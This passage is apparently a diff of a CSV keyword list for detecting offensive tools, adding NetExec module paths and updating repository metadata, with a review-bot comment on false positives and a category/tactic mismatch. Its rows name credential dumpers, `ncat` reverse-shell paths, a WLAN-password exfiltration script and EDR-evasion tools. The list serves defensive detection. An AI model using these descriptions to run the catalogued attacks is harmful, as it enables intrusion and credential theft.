-"*\ThemeBleed.sln*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" -"*\TheThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\the-backdoor-factory\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*\ThemeBleed.sln*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*\TheThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*\TikiCompiler.txt*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" 
"*\TikiService.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. 
The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" 
@@ -6476,7 +6610,8 @@
 "*\Tor\torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*\TorBrowser*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*\TrustExec.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
-"*\UACME-*.zip*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*\uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\UACME-*.zip*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*\uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*\unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z"
 "*\unquotedsvcpath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
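Review bot: The added `*\uac.py*` row matches any Windows path containing a file named uac.py, yet it carries `metadata_severity_score` `10` and an `N/A` comment, so an endpoint rule built from it will alert on unrelated scripts of that name with the same weight as a tool-specific artefact. I would either narrow the keyword so it includes part of the tool's own directory path, or set `metadata_comment` to a caveat such as `"generic file name - high risk of false positives"` and lower the severity. The row also sets the category to `Credential Access` while its tactic list `TA0007 - TA0003 - TA0002 - TA0001` contains no TA0006, which looks like tool-level metadata copied onto every NetExec keyword. The `*\veeam_dump.py*` row added in the next hunk has the same category/tactic mismatch.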
@@ -6485,8 +6620,9 @@ "*\users\public\sam.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*\users\public\system.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*\Users\Public\termsrv.dll*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*\Users_Nochangedpassword.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Users_Nochangedpassword.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*\UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - 
T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*\veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" 
@@ -6495,43 +6631,50 @@ "*\wdextract.vcxproj*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*\WdigestOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WdigestOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - 
T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*\whatlicense-main\*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - 
TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*\while_dll_ms*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\Windows\Tasks\Certipy*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*\whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Windows\Tasks\Certipy*","offensive_tool_keyword","certsync","Dump NTDS with 
golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*\Windows\Tasks\p4yl0ad*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*\Windows\Temp\creds.db*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" -"*\windows\temp\ncat.exe -nv *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*\windows\temp\pwned.trx*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*\Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*\WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*\Win-PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*\windows\temp\ncat.exe -nv *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\windows\temp\pwned.trx*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*\Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - 
TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*\WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*\Win-PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*\winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\WiperPoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*\wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - 
T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\wl_log.txt*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\wl-lic.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\wl-lic.pdb*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\wmi_1.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*\wmi_2.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" -"*\WritebleRegistryKeys.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
